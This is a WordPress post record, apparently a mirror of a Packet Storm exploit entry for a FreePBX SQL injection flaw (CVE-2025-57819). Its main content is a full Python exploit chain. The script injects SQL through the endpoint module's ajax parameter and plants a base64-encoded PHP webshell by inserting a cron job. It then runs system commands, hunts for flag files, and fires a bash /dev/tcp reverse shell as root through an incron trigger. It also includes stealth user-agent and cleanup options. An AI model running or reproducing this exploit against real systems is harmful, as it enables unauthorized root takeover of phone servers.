{"id":62696,"date":"2026-06-15T12:42:34","date_gmt":"2026-06-15T12:42:34","guid":{"rendered":"https:\/\/zero.redgem.net\/?p=62696"},"modified":"2026-06-15T12:42:34","modified_gmt":"2026-06-15T12:42:34","slug":"freepbx-sql-injection-shell-upload-remote-root","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=62696","title":{"rendered":"\ud83d\udcc4 FreePBX SQL Injection \/ Shell Upload \/ Remote Root_PACKETSTORM:223388"},"content":{"rendered":"

{“lastseen”:”2026-06-15T16:48:33″,”description”:”This Python3 script exploits a remote SQL injection vulnerability in FreePBX and adds a remote shell that achieves root privileges. This issue has been patched in endpoint versions 15.0.66, 16.0.89, and 17.0.3…”,”published”:”2026-06-15T00:00:00″,”modified”:”2026-06-15T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 FreePBX SQL Injection \/ Shell Upload \/ Remote Root”,”source”:””,”references”:””,”id”:”PACKETSTORM:223388″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-57819″],”sourceData”:”==================================================================================================================================\\n | # Title : FreePBX 17.0.3 SQLi to Root Shell |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 151.0.3 (64 bits) |\\n | # Vendor : https:\/\/www.freepbx.org\/ |\\n ==================================================================================================================================\\n \\n [+] Summary : This Python3 script exploits a critical SQL injection vulnerability (CVE-2025-57819) in FreePBX. \\n This issue has been patched in endpoint versions 15.0.66, 16.0.89, and 17.0.3.\\n \\n \\n [+] POC : \\n \\n #!\/usr\/bin\/env python3\\n \\n import requests\\n import urllib3\\n import sys\\n import time\\n import base64\\n import json\\n import zlib\\n import threading\\n import socket\\n import re\\n from urllib.parse import quote, urlparse\\n from colorama import init, Fore, Style\\n import argparse\\n import random\\n import string\\n \\n init(autoreset=True)\\n urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\\n \\n class FreePBXExploit:\\n def __init__(self, target, lhost=None, lport=None, verbose=False, stealth=False):\\n self.target = target.rstrip(‘\/’)\\n self.lhost = lhost\\n self.lport = lport\\n self.verbose = verbose\\n self.stealth = stealth\\n self.session = requests.Session()\\n self.webshell_path = None\\n self.session.headers.update({\\n ‘User-Agent’: self.get_random_ua() if stealth else ‘Mozilla\/5.0 (X11; Linux x86_64)’\\n })\\n def get_random_ua(self):\\n uas = [\\n ‘Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36’,\\n ‘Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit\/537.36’,\\n ‘Mozilla\/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit\/537.36’\\n ]\\n return random.choice(uas)\\n def log_info(self, msg): print(f\\”{Fore.CYAN}[*]{Style.RESET_ALL} {msg}\\”)\\n def log_success(self, msg): print(f\\”{Fore.GREEN}[+]{Style.RESET_ALL} {msg}\\”)\\n def log_warning(self, msg): print(f\\”{Fore.YELLOW}[!]{Style.RESET_ALL} {msg}\\”)\\n def log_error(self, msg): print(f\\”{Fore.RED}[-]{Style.RESET_ALL} {msg}\\”)\\n def log_debug(self, msg):\\n if self.verbose:\\n print(f\\”{Fore.MAGENTA}[D]{Style.RESET_ALL} {msg}\\”)\\n def build_sqli_url(self, payload):\\n \\”\\”\\”Build URL with SQL injection payload\\”\\”\\”\\n ajax_path = f\\”{self.target}\/admin\/ajax.php\\”\\n module = \\”FreePBX\\\\\\\\modules\\\\\\\\endpoint\\\\\\\\ajax\\”\\n params = {\\n ‘module’: module,\\n ‘command’: ‘model’,\\n ‘template’: ‘x’,\\n ‘model’: ‘model’,\\n ‘brand’: payload\\n }\\n param_str = ‘\\u0026′.join([f\\”{k}={quote(str(v))}\\” for k, v in params.items()])\\n return f\\”{ajax_path}?{param_str}\\”\\n def sqli_read(self, subquery, retries=3):\\n \\”\\”\\”Extract data via error-based SQL injection\\”\\”\\”\\n payload = f\\”x’ AND EXTRACTVALUE(1,CONCAT(0x7e,({subquery}),0x7e))– -\\”\\n for attempt in range(retries):\\n try:\\n url = self.build_sqli_url(payload)\\n response = self.session.get(url, verify=False, timeout=10)\\n if response.status_code == 200:\\n try:\\n data = response.json()\\n error_msg = data.get(‘error’, {}).get(‘message’, ”)\\n match = re.search(r’~([^~]+)~’, error_msg)\\n if match:\\n return match.group(1)\\n except:\\n pass\\n except Exception as e:\\n self.log_debug(f\\”SQLi read attempt {attempt + 1} failed: {e}\\”)\\n time.sleep(1)\\n return None\\n def sqli_write(self, statement):\\n \\”\\”\\”Execute SQL write operation\\”\\”\\”\\n payload = f\\”x’; {statement}– -\\”\\n try:\\n url = self.build_sqli_url(payload)\\n response = self.session.get(url, verify=False, timeout=10)\\n if response.status_code == 200:\\n if ‘Whoops’ in response.text or ‘array offset’ in response.text:\\n return True\\n except Exception as e:\\n self.log_debug(f\\”SQLi write error: {e}\\”)\\n return True \\n return False\\n def webshell_exec(self, cmd):\\n \\”\\”\\”Execute command via webshell\\”\\”\\”\\n if not self.webshell_path:\\n return None\\n try:\\n url = f\\”https:\/\/{self.target}{self.webshell_path}\\”\\n response = self.session.get(url, params={‘cmd’: cmd}, verify=False, timeout=15)\\n if response.status_code == 200:\\n return response.text.strip()\\n except:\\n pass\\n return None\\n def enumerate_database(self):\\n \\”\\”\\”Enumerate database information\\”\\”\\”\\n self.log_info(\\”Enumerating database…\\”)\\n db_info = {}\\n queries = {\\n ‘database’: ‘SELECT DATABASE()’,\\n ‘user’: ‘SELECT USER()’,\\n ‘version’: ‘SELECT VERSION()’,\\n ‘hostname’: ‘SELECT @@hostname’\\n }\\n for key, query in queries.items():\\n result = self.sqli_read(query)\\n if result:\\n db_info[key] = result\\n self.log_success(f\\”{key.capitalize()}: {result}\\”)\\n else:\\n self.log_warning(f\\”Could not retrieve {key}\\”)\\n return db_info\\n def drop_webshell(self):\\n \\”\\”\\”Drop PHP webshell via cron job\\”\\”\\”\\n self.log_info(\\”Dropping webshell via cron job…\\”)\\n random_name = ”.join(random.choices(string.ascii_lowercase, k=8))\\n self.webshell_path = f\\”\/{random_name}.php\\”\\n webshell_code = \\”PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ID8+Cg==\\”\\n full_path = f\\”\/var\/www\/html{self.webshell_path}\\”\\n cmd = f\\”echo {webshell_code} | base64 -d \\u003e {full_path}\\”\\n cron_name = f\\”sys_{random_name}\\” if self.stealth else \\”poc_webshell\\”\\n sql = f\\”\\”\\”\\n INSERT INTO cron_jobs \\n (modulename, jobname, command, class, schedule, max_runtime, enabled, execution_order) \\n VALUES (‘sysadmin’, ‘{cron_name}’, ‘{cmd}’, NULL, ‘* * * * *’, 30, 1, 1)\\n \\”\\”\\”\\n if self.sqli_write(sql):\\n self.log_success(f\\”Cron job inserted (executes every minute)\\”)\\n return True\\n else:\\n self.log_error(\\”Failed to insert cron job\\”)\\n return False\\n def wait_for_webshell(self, timeout=120):\\n \\”\\”\\”Wait for webshell to become active\\”\\”\\”\\n self.log_info(f\\”Waiting for webshell activation (max {timeout}s)…\\”)\\n start_time = time.time()\\n while time.time() – start_time \\u003c timeout:\\n result = self.webshell_exec(\\”id\\”)\\n if result and (‘uid=’ in result or ‘gid=’ in result):\\n self.log_success(f\\”Webshell active! Response: {result[:100]}\\”)\\n return True\\n elapsed = int(time.time() – start_time)\\n remaining = timeout – elapsed\\n self.log_info(f\\”Webshell not ready… ({remaining}s remaining)\\”)\\n time.sleep(10)\\n self.log_error(\\”Timeout waiting for webshell\\”)\\n return False\\n def execute_system_commands(self, commands):\\n \\”\\”\\”Execute multiple system commands and collect output\\”\\”\\”\\n results = {}\\n for cmd in commands:\\n self.log_info(f\\”Executing: {cmd}\\”)\\n output = self.webshell_exec(cmd)\\n if output:\\n results[cmd] = output\\n print(f\\” {output[:200]}\\”)\\n else:\\n print(\\” (no output)\\”)\\n return results\\n def get_flags(self):\\n \\”\\”\\”Attempt to read CTF flags\\”\\”\\”\\n self.log_info(\\”Searching for flags…\\”)\\n flag_patterns = [\\n ‘\/home\/*\/user.txt’,\\n ‘\/home\/*\/flag.txt’,\\n ‘\/root\/root.txt’,\\n ‘\/root\/flag.txt’,\\n ‘\/var\/www\/html\/flag.txt’\\n ]\\n flags_found = []\\n for pattern in flag_patterns:\\n cmd = f\\”find {pattern} -type f 2\\u003e\/dev\/null | head -1\\”\\n path = self.webshell_exec(cmd)\\n if path and path.strip():\\n flag = self.webshell_exec(f\\”cat {path.strip()}\\”)\\n if flag and len(flag) \\u003c 200:\\n self.log_success(f\\”Flag found at {path}: {flag}\\”)\\n flags_found.append((path, flag))\\n return flags_found\\n def incron_root_shell(self):\\n \\”\\”\\”Use incron hook for root reverse shell\\”\\”\\”\\n if not self.lhost or not self.lport:\\n self.log_warning(\\”No listener configured, skipping root shell\\”)\\n return False\\n self.log_info(\\”Preparing incron-based root shell…\\”)\\n rev_shell = f\\”bash -i \\u003e\\u0026 \/dev\/tcp\/{self.lhost}\/{self.lport} 0\\u003e\\u00261\\”\\n payload_data = [rev_shell, \\”txn\\”]\\n json_str = json.dumps(payload_data)\\n compressed = zlib.compress(json_str.encode())\\n encoded = base64.b64encode(compressed).decode().replace(‘\/’, ‘_’)\\n trigger_file = f\\”\/var\/spool\/asterisk\/incron\/api.fwconsole-commands.{encoded}\\”\\n self.log_info(f\\”Trigger file: {trigger_file}\\”)\\n self.log_warning(f\\”Start listener: nc -lvnp {self.lport}\\”)\\n input(f\\”{Fore.YELLOW}[?]{Style.RESET_ALL} Press Enter when listener is ready…\\”)\\n result = self.webshell_exec(f\\”touch ‘{trigger_file}’\\”)\\n if result is None or result == \\”\\”:\\n self.log_success(\\”Trigger file created – incron should fire as root!\\”)\\n self.log_info(\\”Check your listener for root shell…\\”)\\n time.sleep(5)\\n return True\\n else:\\n self.log_error(f\\”Failed to create trigger file: {result}\\”)\\n return False\\n def cleanup(self):\\n \\”\\”\\”Remove webshell and cron job\\”\\”\\”\\n self.log_info(\\”Cleaning up…\\”)\\n if self.webshell_path:\\n full_path = f\\”\/var\/www\/html{self.webshell_path}\\”\\n self.webshell_exec(f\\”rm -f {full_path}\\”)\\n self.log_success(\\”Webshell removed\\”)\\n sql = \\”DELETE FROM cron_jobs WHERE jobname LIKE ‘poc_%’ OR jobname LIKE ‘sys_%’\\”\\n self.sqli_write(sql)\\n self.log_success(\\”Cron jobs cleaned\\”)\\n def run_exploit(self):\\n \\”\\”\\”Main exploit chain\\”\\”\\”\\n print(f\\”\\”\\”\\n {Fore.MAGENTA}\u2554\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2557\\n \u2551 FreePBX CVE-2025-57819 – Advanced Exploit \u2551\\n \u2551 Full Chain: SQLi \u2192 Webshell \u2192 Root Shell \u2551\\n \u255a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u255d{Style.RESET_ALL}\\n \\”\\”\\”)\\n self.log_info(f\\”Target: https:\/\/{self.target}\\”)\\n if self.lhost:\\n self.log_info(f\\”Listener: {self.lhost}:{self.lport}\\”)\\n self.log_info(\\”Step 1: Verifying SQL injection…\\”)\\n test_result = self.sqli_read(\\”SELECT 123\\”)\\n if test_result != \\”123\\”:\\n self.log_error(\\”SQL injection not working!\\”)\\n return False\\n self.log_success(\\”SQL injection confirmed!\\”)\\n self.enumerate_database()\\n self.log_info(\\”Step 2: Dropping webshell…\\”)\\n if not self.drop_webshell():\\n return False\\n if not self.wait_for_webshell():\\n return False\\n self.log_info(\\”Step 3: System reconnaissance…\\”)\\n recon_cmds = [\\n \\”id\\”,\\n \\”hostname\\”,\\n \\”uname -a\\”,\\n \\”whoami\\”,\\n \\”pwd\\”\\n ]\\n self.execute_system_commands(recon_cmds)\\n self.get_flags()\\n if self.lhost and self.lport:\\n self.log_info(\\”Step 4: Attempting root shell…\\”)\\n self.incron_root_shell()\\n cleanup = input(f\\”\\\\n{Fore.YELLOW}[?]{Style.RESET_ALL} Cleanup artifacts? [y\/N] \\”)\\n if cleanup.lower() == ‘y’:\\n self.cleanup()\\n self.log_success(\\”Exploit completed!\\”)\\n return True\\n def main():\\n parser = argparse.ArgumentParser(description=’FreePBX CVE-2025-57819 Exploit’)\\n parser.add_argument(‘-t’, ‘–target’, required=True, help=’Target FreePBX URL (e.g., connected.htb)’)\\n parser.add_argument(‘-l’, ‘–lhost’, help=’Listener IP for reverse shell’)\\n parser.add_argument(‘-p’, ‘–lport’, type=int, help=’Listener port’)\\n parser.add_argument(‘-v’, ‘–verbose’, action=’store_true’, help=’Verbose output’)\\n parser.add_argument(‘-s’, ‘–stealth’, action=’store_true’, help=’Enable stealth mode’)\\n parser.add_argument(‘–check’, action=’store_true’, help=’Only check vulnerability’)\\n args = parser.parse_args()\\n exploit = FreePBXExploit(\\n target=args.target,\\n lhost=args.lhost,\\n lport=args.lport,\\n verbose=args.verbose,\\n stealth=args.stealth\\n )\\n if args.check:\\n print(\\”Checking vulnerability…\\”)\\n result = exploit.sqli_read(\\”SELECT 123\\”)\\n if result == \\”123\\”:\\n print(f\\”{Fore.GREEN}[+] Target is VULNERABLE{Style.RESET_ALL}\\”)\\n else:\\n print(f\\”{Fore.RED}[-] Target is NOT vulnerable{Style.RESET_ALL}\\”)\\n return\\n exploit.run_exploit()\\n if __name__ == \\”__main__\\”:\\n main()\\n \\t\\n \\t\\n Greetings to :==============================================================================\\n jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|\\n ============================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/223388″,”cvss”:{“score”:10,”severity”:”CRITICAL”,”vector”:”CVSS:4.0\/AV:N\/AC:L\/AT:N\/PR:N\/UI:N\/VC:H\/SC:H\/VI:H\/SI:H\/VA:H\/SA:H”,”version”:”4.0″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/223388\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"

{“lastseen”:”2026-06-15T16:48:33″,”description”:”This Python3 script exploits a remote SQL injection vulnerability in FreePBX and adds a remote shell that achieves root privileges. This issue has been patched…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,36,12,13,53,7,11,5],"class_list":["post-62696","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-100","tag-exploit","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n\ud83d\udcc4 FreePBX SQL Injection \/ Shell Upload \/ Remote Root_PACKETSTORM:223388 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=62696\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 FreePBX SQL Injection \/ Shell Upload \/ Remote Root_PACKETSTORM:223388 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{“lastseen”:”2026-06-15T16:48:33″,”description”:”This Python3 script exploits a remote SQL injection vulnerability in FreePBX and adds a remote shell that achieves root privileges. This issue has been patched...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=62696\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-06-15T12:42:34+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"10 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=62696#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=62696\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 FreePBX SQL Injection \\\/ Shell Upload \\\/ Remote Root_PACKETSTORM:223388\",\"datePublished\":\"2026-06-15T12:42:34+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=62696\"},\"wordCount\":1959,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CRITICAL\",\"CVE\",\"CVSS\",\"CVSS-10.0\",\"exploit\",\"news\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=62696#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=62696\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=62696\",\"name\":\"\ud83d\udcc4 FreePBX SQL Injection \\\/ Shell Upload \\\/ Remote Root_PACKETSTORM:223388 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-06-15T12:42:34+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=62696#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=62696\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=62696#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 FreePBX SQL Injection \\\/ Shell Upload \\\/ Remote Root_PACKETSTORM:223388\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 FreePBX SQL Injection \/ Shell Upload \/ Remote Root_PACKETSTORM:223388 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=62696","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 FreePBX SQL Injection \/ Shell Upload \/ Remote Root_PACKETSTORM:223388 - zero redgem","og_description":"{“lastseen”:”2026-06-15T16:48:33″,”description”:”This Python3 script exploits a remote SQL injection vulnerability in FreePBX and adds a remote shell that achieves root privileges. This issue has been patched...","og_url":"https:\/\/zero.redgem.net\/?p=62696","og_site_name":"zero redgem","article_published_time":"2026-06-15T12:42:34+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"10 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=62696#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=62696"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 FreePBX SQL Injection \/ Shell Upload \/ Remote Root_PACKETSTORM:223388","datePublished":"2026-06-15T12:42:34+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=62696"},"wordCount":1959,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CRITICAL","CVE","CVSS","CVSS-10.0","exploit","news","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=62696#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=62696","url":"https:\/\/zero.redgem.net\/?p=62696","name":"\ud83d\udcc4 FreePBX SQL Injection \/ Shell Upload \/ Remote Root_PACKETSTORM:223388 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-06-15T12:42:34+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=62696#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=62696"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=62696#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 FreePBX SQL Injection \/ Shell Upload \/ Remote Root_PACKETSTORM:223388"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/62696","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=62696"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/62696\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=62696"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=62696"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=62696"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}